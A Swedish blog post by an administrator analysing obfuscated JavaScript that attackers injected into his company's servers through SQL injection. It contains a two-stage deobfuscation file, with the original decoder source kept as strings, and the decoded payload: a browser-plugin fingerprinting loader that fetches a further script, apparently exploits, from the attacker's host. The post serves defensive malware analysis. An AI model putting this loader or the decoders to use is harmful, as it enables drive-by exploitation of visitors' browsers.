fredag 13 juni 2008

Kaos på jobbet, http://www.advabnr.com/ deobfuscated.

Det är alltid lika härligt när man kommer till kontoret efter ett par dagars sjukfrånvaro och upptäcker att några kineser har varit elaka och lekt SQL-injection på servrarna. Efter ett par vändors letande och pillande dök det upp JavaScript-filer, t.ex. http://www.advabnr.com/b.js (jag rekommenderar inte att den som läser detta inlägg klickar på några länkar som serveras i detta blogginlägg).

Denna JS-fil refererar till http://advabnr.com/cgi-bin/index.cgi?ad (stage1), vilket i sig är ytterligare ett JavaScript fullt med obfuscated kod. En stund senare och efter en del reverserande visar det sig att stage1 kort och gott genererade ytterligare en bit obfuscated kod (stage2), vilken dock gick fortare att läsa ut.

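Det som följer är min temp-fil som användes vid de-obfuscating av filerna. Stage1 och stage2 finns båda med i filen, och det är relativt lätt för den som är "insatt" att följa vad som händer. 'Farlig' kod är borttagen och filen i sig är harmlös; det enda som görs är en console.log av det som skapas i scriptet. Obs: eval-anropet är tydligt utkommenterat i Vx0IAH138 (stage1); kontrollera att eval och omdirigeringen är avstängda även i gN73Os7rj (stage2), som är den funktion som anropas från body onload, innan filen öppnas i en webbläsare.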

(Kod som följer är html-safe och utan text-indent)


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>
</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<script type="text/javascript">
<!--
// Key material for the two decoders below. Each string holds the text of one
// decoder function (hashkey: stage 1, Vx0IAH138; hashkey2: stage 2,
// gN73Os7rj), presumably copied verbatim from the injected script. As the
// strings themselves show, the served functions hash their own source
// (arguments.callee.toString()) together with location.href to derive the
// decryption key; the analysis copies further down read these strings instead.
// Do not rename or otherwise edit the identifiers inside the strings: the
// decoders strip only non-word characters and ignore letter case before
// hashing, so any other change yields a different key. (The "\W" escape
// collapses to "W" inside a string literal, which is harmless here because
// the backslash would have been stripped before hashing anyway.)
var hashkey = "function Vx0IAH138(I7M8YgayI, G38g3p7iO){var X25ks5E5u = 4294967296;var GpRRpt2uv = arguments.callee;GpRRpt2uv = GpRRpt2uv.toString();GpRRpt2uv = GpRRpt2uv + location.href;var nQ412XaP8 = eval;var XP4WWej4F = GpRRpt2uv.replace(/\W/g, \"\");XP4WWej4F = XP4WWej4F.toUpperCase();var VflJFmoSM = new Array;for(var qOFI57SQB = 0; qOFI57SQB < 256; qOFI57SQB++) {VflJFmoSM[qOFI57SQB] = 0;}var ohD16ibkU = 1;for(var qOFI57SQB = 128; qOFI57SQB; qOFI57SQB >>= 1) {ohD16ibkU = ohD16ibkU >>> 1 ^ (ohD16ibkU & 1 ? 3988292384 : 0);for(var tucbfU06P = 0; tucbfU06P < 256; tucbfU06P += qOFI57SQB * 2) {var s8gXebs60 = qOFI57SQB + tucbfU06P;VflJFmoSM[s8gXebs60] = VflJFmoSM[tucbfU06P] ^ ohD16ibkU;if (VflJFmoSM[s8gXebs60] < 0) {VflJFmoSM[s8gXebs60] += X25ks5E5u;}}}var a85pKx3C5 = X25ks5E5u - 1;for(var EB7Im12x0 = 0; EB7Im12x0 < XP4WWej4F.length; EB7Im12x0++) {var q44dw7IBH = (a85pKx3C5 ^ XP4WWej4F.charCodeAt(EB7Im12x0)) & 255;a85pKx3C5 = (a85pKx3C5 >>> 8) ^ VflJFmoSM[q44dw7IBH];}a85pKx3C5 = a85pKx3C5 ^ (X25ks5E5u - 1);if (a85pKx3C5 < 0) {a85pKx3C5 += X25ks5E5u;}a85pKx3C5 = a85pKx3C5.toString(16).toUpperCase();while(a85pKx3C5.length < 8) {a85pKx3C5 = \"0\" + a85pKx3C5;}var kQo6JB5WR = new Array;for(var qOFI57SQB = 0; qOFI57SQB < 8; qOFI57SQB++) {kQo6JB5WR[qOFI57SQB] = a85pKx3C5.charCodeAt(qOFI57SQB);}var BiC0TV1f6 = \"\";var lKjvOh8TW = 0;for(var qOFI57SQB = 0; qOFI57SQB < I7M8YgayI.length; qOFI57SQB += 2){var s8gXebs60 = I7M8YgayI.substr(qOFI57SQB, 2);var OU5aO5F3X = parseInt(s8gXebs60, 16);var An08HVDpW = OU5aO5F3X - kQo6JB5WR[lKjvOh8TW];if(An08HVDpW < 0) {An08HVDpW = An08HVDpW + 256;}BiC0TV1f6 += String.fromCharCode(An08HVDpW);if(lKjvOh8TW + 1 == kQo6JB5WR.length) {lKjvOh8TW = 0;} else {lKjvOh8TW++;}}var KgrV653I7 = 0;try {nQ412XaP8(BiC0TV1f6);} catch(e) {KgrV653I7 = 1;}try {if (KgrV653I7) {window.location = \"/\";}} catch(e) {}}";
// Stage-2 counterpart of hashkey; read by gN73Os7rj.
var hashkey2 = "function gN73Os7rj(ox7QTs8Gt, ag6yPdJEC){var TW6EE2JE0 = 4294967296; var N3fJvS3EU = arguments.callee;N3fJvS3EU = N3fJvS3EU.toString();N3fJvS3EU = N3fJvS3EU + location.href;var Y0Y266h6o = eval;var rPvK1n6y8 = N3fJvS3EU.replace(/\W/g, \"\");rPvK1n6y8 = rPvK1n6y8.toUpperCase();var kd34hv8lb = new Array;for(var I47PSww6v = 0; I47PSww6v < 256; I47PSww6v++) {kd34hv8lb[I47PSww6v] = 0;}var I0Y3LC81s = 1;for(var I47PSww6v = 128; I47PSww6v; I47PSww6v >>= 1) {I0Y3LC81s = I0Y3LC81s >>> 1 ^ (I0Y3LC81s & 1 ? 3988292384 : 0);for(var nLFFcAHJl = 0; nLFFcAHJl < 256; nLFFcAHJl += I47PSww6v * 2) {var kD052e50w = I47PSww6v + nLFFcAHJl;kd34hv8lb[kD052e50w] = kd34hv8lb[nLFFcAHJl] ^ I0Y3LC81s;if (kd34hv8lb[kD052e50w] < 0) {kd34hv8lb[kD052e50w] += TW6EE2JE0;}}}var NGOlENwso = TW6EE2JE0 - 1;for(var d8O0bR2KA = 0; d8O0bR2KA < rPvK1n6y8.length; d8O0bR2KA++) {var g3gDRk0FD = (NGOlENwso ^ rPvK1n6y8.charCodeAt(d8O0bR2KA)) & 255;NGOlENwso = (NGOlENwso >>> 8) ^ kd34hv8lb[g3gDRk0FD];}NGOlENwso = NGOlENwso ^ (TW6EE2JE0 - 1);if (NGOlENwso < 0) {NGOlENwso += TW6EE2JE0;}NGOlENwso = NGOlENwso.toString(16).toUpperCase();while(NGOlENwso.length < 8) {NGOlENwso = \"0\" + NGOlENwso;}var B51cE2gJG = new Array;for(var I47PSww6v = 0; I47PSww6v < 8; I47PSww6v++) {B51cE2gJG[I47PSww6v] = NGOlENwso.charCodeAt(I47PSww6v);}var F60UrJ4CE = \"\";var xVNicY002 = 0;for(var I47PSww6v = 0; I47PSww6v < ox7QTs8Gt.length; I47PSww6v += 2){var kD052e50w = ox7QTs8Gt.substr(I47PSww6v, 2);var P72IU0651 = parseInt(kD052e50w, 16);var Khs56S3Hb = P72IU0651 - B51cE2gJG[xVNicY002];if(Khs56S3Hb < 0) {Khs56S3Hb = Khs56S3Hb + 256;}F60UrJ4CE += String.fromCharCode(Khs56S3Hb);if(xVNicY002 + 1 == B51cE2gJG.length) {xVNicY002 = 0;} else {xVNicY002++;}}var sJ7rjoWYl = 0;try {Y0Y266h6o(F60UrJ4CE);} catch(e) {sJ7rjoWYl = 1;}try {if (sJ7rjoWYl) {window.location = \"/\";}} catch(e) {}}";


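// Stage-2 decoder from the injected script, defanged for analysis: it derives
// the key, decodes the payload and writes the plaintext to the console.
// The served version passed the plaintext to eval() and sent the browser to
// "/" when that failed. Both steps are removed here, so opening this file
// never executes the decoded payload; this matches how the stage-1 decoder
// Vx0IAH138 is handled in the same file.
//
// ox7QTs8Gt: payload as a hex string, two hex digits per encoded byte.
// ag6yPdJEC: unused by the decoder.
//
// Key derivation: CRC-32 (reflected polynomial 3988292384 = 0xEDB88320) over
// the decoder's source text plus the script URL, after removing every
// non-word character and upper-casing the rest. The eight upper-case hex
// digits of that checksum are the key; the matching key character code is
// subtracted from each payload byte, modulo 256.
function gN73Os7rj(ox7QTs8Gt, ag6yPdJEC) {
  var TWO_POW_32 = 4294967296;

  // The served code hashed arguments.callee.toString() + location.href.
  // hashkey2 and the hard-coded URL stand in for both, so the same key can be
  // derived outside the compromised page.
  var keyMaterial = hashkey2.toString() + "http://advabnr.com/cgi-bin/index.cgi?ad";
  keyMaterial = keyMaterial.replace(/\W/g, "").toUpperCase();

  // Build the 256-entry CRC-32 lookup table.
  var crcTable = new Array;
  for (var i = 0; i < 256; i++) {
    crcTable[i] = 0;
  }
  var term = 1;
  for (var step = 128; step; step >>= 1) {
    term = (term >>> 1) ^ (term & 1 ? 3988292384 : 0);
    for (var base = 0; base < 256; base += step * 2) {
      var slot = step + base;
      crcTable[slot] = crcTable[base] ^ term;
      // Bitwise operators return signed 32-bit values; keep entries unsigned.
      if (crcTable[slot] < 0) {
        crcTable[slot] += TWO_POW_32;
      }
    }
  }

  // Checksum the normalised key material.
  var crc = TWO_POW_32 - 1;
  for (var pos = 0; pos < keyMaterial.length; pos++) {
    var index = (crc ^ keyMaterial.charCodeAt(pos)) & 255;
    crc = (crc >>> 8) ^ crcTable[index];
  }
  crc = crc ^ (TWO_POW_32 - 1);
  if (crc < 0) {
    crc += TWO_POW_32;
  }

  // The key is the checksum as eight upper-case hex digits.
  var keyText = crc.toString(16).toUpperCase();
  while (keyText.length < 8) {
    keyText = "0" + keyText;
  }

  // Decode: payload byte minus key character code, wrapped into 0..255, with
  // the key repeating every eight bytes.
  var plain = "";
  var keyIndex = 0;
  for (var offset = 0; offset < ox7QTs8Gt.length; offset += 2) {
    var value = parseInt(ox7QTs8Gt.substr(offset, 2), 16) - keyText.charCodeAt(keyIndex);
    if (value < 0) {
      value += 256;
    }
    plain += String.fromCharCode(value);
    keyIndex = keyIndex + 1 == keyText.length ? 0 : keyIndex + 1;
  }

  // Analysis output only. The decoded text is never evaluated and the page is
  // never redirected.
  console.log(plain);
}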

// Stage-1 decoder from the injected script, kept for analysis. It derives the
// key, decodes the payload and logs the plaintext; the served version's eval()
// call and its redirect to "/" stay disabled.
//
// var1: payload as a hex string, two hex digits per encoded byte.
// var2: unused.
//
// The key is the CRC-32 (reflected polynomial 3988292384 = 0xEDB88320) of the
// decoder's source text plus the script URL, with non-word characters removed
// and the rest upper-cased, written as eight upper-case hex digits.
function Vx0IAH138(var1, var2)
{
  // hashkey stands in for arguments.callee and the URL for location.href.
  var source = hashkey.toString() + "http://advabnr.com/cgi-bin/index.cgi?ad";
  var normalized = source.replace(/\W/g, "").toUpperCase();

  // CRC-32 lookup table; ">>> 0" keeps each entry as an unsigned value.
  var table = [];
  var n;
  for (n = 0; n < 256; n += 1) {
    table.push(0);
  }
  var term = 1;
  var half = 128;
  while (half) {
    term = (term >>> 1) ^ ((term & 1) ? 3988292384 : 0);
    for (n = 0; n < 256; n += half * 2) {
      table[half + n] = (table[n] ^ term) >>> 0;
    }
    half >>= 1;
  }

  // Checksum of the normalised key material, as eight upper-case hex digits.
  var crc = 4294967295;
  for (n = 0; n < normalized.length; n += 1) {
    crc = (crc >>> 8) ^ table[(crc ^ normalized.charCodeAt(n)) & 255];
  }
  var digest = ((crc ^ 4294967295) >>> 0).toString(16).toUpperCase();
  digest = "00000000".substr(digest.length) + digest;

  // Payload byte minus key character code, wrapped into 0..255; the key
  // repeats every eight bytes.
  var pieces = [];
  for (n = 0; n < var1.length; n += 2) {
    var encoded = parseInt(var1.substr(n, 2), 16);
    var code = encoded - digest.charCodeAt((n / 2) % 8);
    pieces.push(String.fromCharCode(code < 0 ? code + 256 : code));
  }
  var decoded = pieces.join("");

  console.log(decoded);

  // Disabled on purpose: the served script called eval(decoded) here and set
  // window.location = "/" when that call threw.
}
// Marker written while the script block is parsed, so it comes before any
// decoder output, which is only logged once the <body onload> handler runs.
console.log("New\n");
//Load stage1 <body onload="Vx0IAH138('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')">
//Load stage2 <body onload="gN73Os7rj('50509BAB636A5596B2a9a7b2a8b0a8608cBE8a9293a17E966c66ad524d4f3ea8a4B852B5997564648f9A9E4e80625b626A813F4Fb9a3A652af90748D9b7A969d4c83526c73725B6D5050A8a6B5629868937a94b87cA33D6f636d62756A7D413Cb9a7A465B1978b84959D63904C7F545973765980504C413cB7B8AB65be4f3e3Ba9b5a4656bB895A463bb67998d7984829D836280B877887c7a96829F7Fb095a8acad93b9B2b462a2afbb99aeb1b5629Ea8B499B9ab7dA96797906995939C5F5D6c66AD524D4B3Da8A4B852AFB59b7B78BD7F74658062a293b9AF99A6B7b1a660b3b2a7ACACb0A78dB87b868f7a92848ca074A0A6b0A76F3F4D4f3b524d4B3D9bA9665ab5997564648F9a9e65807F5462636C5865ADb48d7989c06b8771ABA296a8BE81ab6b6485a7ACA99d99acaf99546C665382636f655B63c13f4f4C4B3da8a4B85287bca68e9688b1a8658062A493b5B9978eB1B65C9CB59F798Bbd7b7660B5ABA2B1A4A5995A72A27674aa6e5b596C6F6d524d4f3E3B4C4F9bab636A76aba7A0968aAEB8547063765B65be4f3E3B4C4F3BB5997564648F9A9E65806276ABA7A0968aAEb862A6b299a6b7acB09B5A747c5b804c4B3D3b50503b4e4CBF413c4c4faf524d4F3E3b4cAF98656bAE7e748B9e6aa7AE62716F636d62756A625A5863b0A49e8A88AE6B85749bB3A7a7ac81a96e5486a7b19697638795b7B2a495A6656f5266806261636c66AD524D4B3D3Badb88B8c89BC6D74638352B3a4b89d99a4baA1B771b2A0a7AAafA0b89eB769868D7D82959d9F6296A8B995B7ACB2A89bB2B46D524D4f3e3B4c4F9Bab636A9eA49C8d78BF7c84629BB1AA97bd92a85c54637B546E6363715270775b65BE4F3e3b4C4F3BB18D847C8a7Ba89d6580625b62786d6D524D4B3d3Bc06697B1B6A7549Ba9665aAFB59B7B78BD7f7473ACB09897BB95986d65626A546c665382636F655B63C13f4F4c4b3D3baf90748D9B7a969D6383526C73785B6D50503B4e4CBF5497afb99765aca8545aADB88B8c89BC6D7471AFA0A9a8ba83986b68527C656b545380665f766c62af3F4d4F3B4E4cAE7E748b9e6Aa7AE6271526A76696c7e4f3E3b4c4faf65A8aeA79763c13F4f4C4B3d3BAF90748d9b7A969D6383526c73735B6d50503b4e4cBF413C4C4fAF524D4F3e3b4caf98656Ba66a8277a8a57eA462716f636d62756A625a5863B0A49e8A88ae6B85749bB3a7A7AC81A96E5498abb1979dbaa7A8AA6388A093b6AE546E6363715270775b65be4F3e3B4c4fA8a6b562A9ab79b4667D9A8D546F636d5980504c3d3b4Cb0a49e8a88AE6b85666F65b1a3aa9baaa7a6B4B570a49Eb8AD9bb3B69da96797906995939c9160A7abA5a8b5ABa4a6ACb5A0805
04C413C4C4F3BabB2B45Ca8A4b852BFB677aaa590BC77658062646d63c0a57ab9b581A888666E65ADB48D7989C06B8771AE99a0aaBA9a8063BCA767b9B97fbb886D5F5B63c13f4f4C4B3d3Bb9a7A4658C849d7b8bad8A97637f549CB59f798BBD7b7660A6ae93b784B65CACB67BA8b890B8795B7E533c524D4b3d3B4CAF98656b639DA591A7806Db3A3a6A5a88Fa0B96b8b769B8c8E999D956b5d52BFc2526D8c849d7b8Bad8A97637f71526A745965696854a7bc7CA0797B997f60afABa0ACB7AA547063765B6e63bd413c4c4F3b4e4Cb7ad68B17A6A9C8E625f6f638f74AE8C8a9b8a95813f4f4C4B3D3BC06697b1B6A7549BA9665abaBC78a2667b9D7D73afA7a299b7AE528363725D52be533C4e4c4B3D3Ba5B897A6AE7d413C4c4F3B4ec04f3E3B4C4FAF524d4f3E3B4C4fA8a6B5627E75B7A0ac797ba8546f63BBab7BB1766c898E74A5B5afaba85A6A74596e7E4F3e3f4d4f3b4eaca8545A8D89A69fbd766c989E768f657f626d5B63c13F4f4C4B3d3Ba77C8279A5b56d936383526C7aa55b6D50503b4E4CBF5497AFb99765ACa8545A8D89a69fbd766c989E768f65807f546b636C58658d85a88Cbd7a6AAB9e7391528083527563685A528D89A69fBD766c989e788f657F62656378665B65be4f3e3B4C4F3Ba979926894b67F936580625b69766d6d524d4b3d3bc0533c4e4CBF413c50503b4eaca8545aAF90748D9b7a969D63676f6573625a5863B6887873748086AF665382637254586966967B937696A57ca752668062645B63c13F4F4C4B3D94B5AB93B07E4f3E3B4cc33f4F4cBF413CC06695a6B7A59C5Aa86F52C063bf413c5050A6b7BC62af3f4d4f9BAB636aa293B9af99A6B7b1a660B0af9faa97bba497B6A154BBaca699a172be5Fb2B66FAB9fB9688F73A8B09594afAB9695AFb79b9bb16F3F4f4C4ba2879A98849c748d546F636d62766A7d413CC06695a6B7a59C5AA86f52C063bf413c5050a9ADACae995ab39c6575758e889e71B297B3aab69c527f666a6E504c3Da2997962778f96A052806659756a625f52B39C6575758E889E7E533C524D4f3Ea8a4b852b4afBAae75b5789e65806298a1A6bb9faaB1B66295b5AB93b9A887a097B0ABA0B96b64a795B5AFA2b9656B6f3F4db59EBDBD85a664af74a5aab783A8A6B5AF94baB7A75C54b7bfa2AA656e5454B7abAAb972AC95a8A4b995B7acB2a8546c813f4FB2AEACAC86B864B171B599A684BAA6B7aca4A9A6a86E54B8b5a5565E63689ab9b7b26e6172A796BBa4a4a2a471a9A1b272a59B9b70a89BB372aba296A8BE60A8AAab736b73766a7C78a86D627a7a987574746462737d69aa73A798677b766475737264627376627575A66C677c7F677bA4a89a627368527063b28a6573787e99AF625F52b19B89979
599657D637152b18d847c8A7bA89D656E629868937a94B87CA35d6D50503f4FA7b197a7b0aba0b971A4A396bc7493B5B3A7A29686AE9Bb1a76Aa39eBBc075b775ae5D6D5050AF524d')">

//-->
</script>
</head>
<body onload="gN73Os7rj('50509BAB636A5596B2a9a7b2a8b0a8608cBE8a9293a17E966c66ad524d4f3ea8a4B852B5997564648f9A9E4e80625b626A813F4Fb9a3A652af90748D9b7A969d4c83526c73725B6D5050A8a6B5629868937a94b87cA33D6f636d62756A7D413Cb9a7A465B1978b84959D63904C7F545973765980504C413cB7B8AB65be4f3e3Ba9b5a4656bB895A463bb67998d7984829D836280B877887c7a96829F7Fb095a8acad93b9B2b462a2afbb99aeb1b5629Ea8B499B9ab7dA96797906995939C5F5D6c66AD524D4B3Da8A4B852AFB59b7B78BD7F74658062a293b9AF99A6B7b1a660b3b2a7ACACb0A78dB87b868f7a92848ca074A0A6b0A76F3F4D4f3b524d4B3D9bA9665ab5997564648F9a9e65807F5462636C5865ADb48d7989c06b8771ABA296a8BE81ab6b6485a7ACA99d99acaf99546C665382636f655B63c13f4f4C4B3da8a4B85287bca68e9688b1a8658062A493b5B9978eB1B65C9CB59F798Bbd7b7660B5ABA2B1A4A5995A72A27674aa6e5b596C6F6d524d4f3E3B4C4F9bab636A76aba7A0968aAEB8547063765B65be4f3E3B4C4F3BB5997564648F9A9E65806276ABA7A0968aAEb862A6b299a6b7acB09B5A747c5b804c4B3D3b50503b4e4CBF413c4c4faf524d4F3E3b4cAF98656bAE7e748B9e6aa7AE62716F636d62756A625A5863b0A49e8A88AE6B85749bB3A7a7ac81a96e5486a7b19697638795b7B2a495A6656f5266806261636c66AD524D4B3D3Badb88B8c89BC6D74638352B3a4b89d99a4baA1B771b2A0a7AAafA0b89eB769868D7D82959d9F6296A8B995B7ACB2A89bB2B46D524D4f3e3B4c4F9Bab636A9eA49C8d78BF7c84629BB1AA97bd92a85c54637B546E6363715270775b65BE4F3e3b4C4F3BB18D847C8a7Ba89d6580625b62786d6D524D4B3d3Bc06697B1B6A7549Ba9665aAFB59B7B78BD7f7473ACB09897BB95986d65626A546c665382636F655B63C13f4F4c4b3D3baf90748D9B7a969D6383526C73785B6D50503B4e4CBF5497afb99765aca8545aADB88B8c89BC6D7471AFA0A9a8ba83986b68527C656b545380665f766c62af3F4d4F3B4E4cAE7E748b9e6Aa7AE6271526A76696c7e4f3E3b4c4faf65A8aeA79763c13F4f4C4B3d3BAF90748d9b7A969D6383526c73735B6d50503b4e4cBF413C4C4fAF524D4F3e3b4caf98656Ba66a8277a8a57eA462716f636d62756A625a5863B0A49e8A88ae6B85749bB3a7A7AC81A96E5498abb1979dbaa7A8AA6388A093b6AE546E6363715270775b65be4F3e3B4c4fA8a6b562A9ab79b4667D9A8D546F636d5980504c3d3b4Cb0a49e8a88AE6b85666F65b1a3aa9baaa7a6B4B570a49Eb8AD9bb3B69da96797906995939c9160A7abA5a8b5ABa4a6ACb5A080504C413C4C4F3Ba
bB2B45Ca8A4b852BFB677aaa590BC77658062646d63c0a57ab9b581A888666E65ADB48D7989C06B8771AE99a0aaBA9a8063BCA767b9B97fbb886D5F5B63c13f4f4C4B3d3Bb9a7A4658C849d7b8bad8A97637f549CB59f798BBD7b7660A6ae93b784B65CACB67BA8b890B8795B7E533c524D4b3d3B4CAF98656b639DA591A7806Db3A3a6A5a88Fa0B96b8b769B8c8E999D956b5d52BFc2526D8c849d7b8Bad8A97637f71526A745965696854a7bc7CA0797B997f60afABa0ACB7AA547063765B6e63bd413c4c4F3b4e4Cb7ad68B17A6A9C8E625f6f638f74AE8C8a9b8a95813f4f4C4B3D3BC06697b1B6A7549BA9665abaBC78a2667b9D7D73afA7a299b7AE528363725D52be533C4e4c4B3D3Ba5B897A6AE7d413C4c4F3B4ec04f3E3B4C4FAF524d4f3E3B4C4fA8a6B5627E75B7A0ac797ba8546f63BBab7BB1766c898E74A5B5afaba85A6A74596e7E4F3e3f4d4f3b4eaca8545A8D89A69fbd766c989E768f657f626d5B63c13F4f4C4B3d3Ba77C8279A5b56d936383526C7aa55b6D50503b4E4CBF5497AFb99765ACa8545A8D89a69fbd766c989E768f65807f546b636C58658d85a88Cbd7a6AAB9e7391528083527563685A528D89A69fBD766c989e788f657F62656378665B65be4f3e3B4C4F3Ba979926894b67F936580625b69766d6d524d4b3d3bc0533c4e4CBF413c50503b4eaca8545aAF90748D9b7a969D63676f6573625a5863B6887873748086AF665382637254586966967B937696A57ca752668062645B63c13F4F4C4B3D94B5AB93B07E4f3E3B4cc33f4F4cBF413CC06695a6B7A59C5Aa86F52C063bf413c5050A6b7BC62af3f4d4f9BAB636aa293B9af99A6B7b1a660B0af9faa97bba497B6A154BBaca699a172be5Fb2B66FAB9fB9688F73A8B09594afAB9695AFb79b9bb16F3F4f4C4ba2879A98849c748d546F636d62766A7d413CC06695a6B7a59C5AA86f52C063bf413c5050a9ADACae995ab39c6575758e889e71B297B3aab69c527f666a6E504c3Da2997962778f96A052806659756a625f52B39C6575758E889E7E533C524D4f3Ea8a4b852b4afBAae75b5789e65806298a1A6bb9faaB1B66295b5AB93b9A887a097B0ABA0B96b64a795B5AFA2b9656B6f3F4db59EBDBD85a664af74a5aab783A8A6B5AF94baB7A75C54b7bfa2AA656e5454B7abAAb972AC95a8A4b995B7acB2a8546c813f4FB2AEACAC86B864B171B599A684BAA6B7aca4A9A6a86E54B8b5a5565E63689ab9b7b26e6172A796BBa4a4a2a471a9A1b272a59B9b70a89BB372aba296A8BE60A8AAab736b73766a7C78a86D627a7a987574746462737d69aa73A798677b766475737264627376627575A66C677c7F677bA4a89a627368527063b28a6573787e99AF625F52b19B89979599657D637152b
18d847c8A7bA89D656E629868937a94B87CA35d6D50503f4FA7b197a7b0aba0b971A4A396bc7493B5B3A7A29686AE9Bb1a76Aa39eBBc075b775ae5D6D5050AF524d')">
</body>
</html>


Nedan följer det som genereras av dessa 2 obfuscated steg.
Scriptet söker, som synes, igenom tillgängliga plugins för din browser (QuickTime, Acrobat, Flash), och tyvärr är detta så långt som jag kommer. URL:en som serveras i slutet returnerar hittills, efter mina försök, endast en fake-500-sida, vilket den verkar göra så länge den inte får de variabler den är ute efter. Så vitt jag/vi på kontoret kan se verkar sajten servera färdiga exploits för de plugins som den hittar möjliga hål i. För att undvika att detta händer kan jag inte föreslå annat än att se till att uppgradera de plugins man använder. Om någon annan kommer vidare med detta får ni gärna höra av er till mig.

(Koden är åter igen html-safe och utan text-indent)


// Decoded stage-2 payload: a browser-plugin fingerprinting loader. It records
// what the browser reports for QuickTime, Adobe Acrobat, Flash and a
// video/x-ms-wmv handler, then requests a further script from the same host
// with those values appended to the query string.
// The whole block is skipped when document.IxXMP_Jd is truthy. Nothing in this
// listing sets that property (presumably a run-once marker; confirm against
// the next stage).
if (!document.IxXMP_Jd) {
// Report fields, initialised to their "not detected" values.
var pV302LTl = '0'; // QuickTime: digits taken from the plugin name, as hex
var lJBHX8bk = '00'; // Adobe Acrobat: '05', '06' or '07' by version, else '01'
var d6P4bs9a = '00'; // Flash: '7c' or '73' for the version ranges tested below
var nUWRRW1K = '00'; // '01' when video/x-ms-wmv has an enabled plugin
try {
for (var u5TJ7PPZ=0;u5TJ7PPZ <navigator.plugins.length;u5TJ7PPZ++)
{
var jrYGFz9B = navigator.plugins[u5TJ7PPZ].name;
// QuickTime: all digits in the plugin name are joined and parsed as a single
// number, which is then stored in hexadecimal.
if (pV302LTl == 0 && jrYGFz9B.indexOf("QuickTime") != -1) {
var BydZdEkv = parseInt(jrYGFz9B.replace(/\D/g,''));
if (BydZdEkv > 0) {
pV302LTl = BydZdEkv.toString(16);
}
}
// Acrobat: the version is guessed from " 5", " 6" or " 7" in the description.
// Note that jrYGFz9B now holds the description, so for this plugin entry the
// Flash test below runs against the description instead of the name.
if (lJBHX8bk == '00' && jrYGFz9B.indexOf("Adobe Acrobat") != -1) {
jrYGFz9B = navigator.plugins[u5TJ7PPZ].description;
if (jrYGFz9B.indexOf(" 5") != -1) {
lJBHX8bk = '05';
} else if (jrYGFz9B.indexOf(" 6") != -1) {
lJBHX8bk = '06';
} else if (jrYGFz9B.indexOf(" 7") != -1) {
lJBHX8bk = '07';
} else {
lJBHX8bk = '01';
}
}
if (d6P4bs9a == '00' && jrYGFz9B.indexOf("Shockwave Flash") != -1) {
var uy6n48WK = '';
jrYGFz9B = navigator.plugins[u5TJ7PPZ].description;
// Collect the first run of digits and dots in the description.
for(var zs5vsMvE = 0; zs5vsMvE < jrYGFz9B.length; zs5vsMvE++) {
var IBiIHgXR = jrYGFz9B.charAt(zs5vsMvE);
if (!isNaN(parseInt(IBiIHgXR)) || (IBiIHgXR == '.' && uy6n48WK.length > 0)) {
uy6n48WK += IBiIHgXR;
} else if (uy6n48WK.length > 0) {
break;
}

}
// First component below 9 gives '7c'; 9.0.x with x below 115 gives '73'.
// Any other version leaves the field at '00'.
var JCtZz48f = uy6n48WK.split('.');
if (JCtZz48f[0] < 9) {
d6P4bs9a = '7c';
} else if (JCtZz48f[0] == 9 && JCtZz48f[1] == 0 && JCtZz48f[2] < 115 ) {
d6P4bs9a = '73';
}

}
// Stop scanning once all three plugin fields hold a non-zero value.
if (lJBHX8bk != 0 && pV302LTl != 0 && d6P4bs9a != 0) {
break;
}
}
}
// Errors during the plugin scan are swallowed silently.
catch(e) { }
try {
if (navigator.mimeTypes["video/x-ms-wmv"].enabledPlugin) nUWRRW1K = '01';
}
// A missing video/x-ms-wmv entry throws above; that is ignored as well.
catch(e) { }
// Left-pad the QuickTime field with zeros to at least eight characters.
while(pV302LTl.length < 8) pV302LTl = '0' + pV302LTl;
// Report and next-stage fetch in one request: the four fields are appended to
// a fixed hex prefix (its meaning is not established by this listing) and the
// response is loaded into the page as script. For defenders, a script request
// to this host and path with a long hex query string is the network indicator
// for this stage.
var olxzCr2l = document.createElement("script");
olxzCr2l.setAttribute("type", "text/javascript");
olxzCr2l.setAttribute("src", "http://advabnr.com/cgi-bin/index.cgi?900875f9074f01200077e0ed58020000000002d859956aff00" + pV302LTl + nUWRRW1K + lJBHX8bk + d6P4bs9a);
document.body.appendChild(olxzCr2l);
}




/Dari
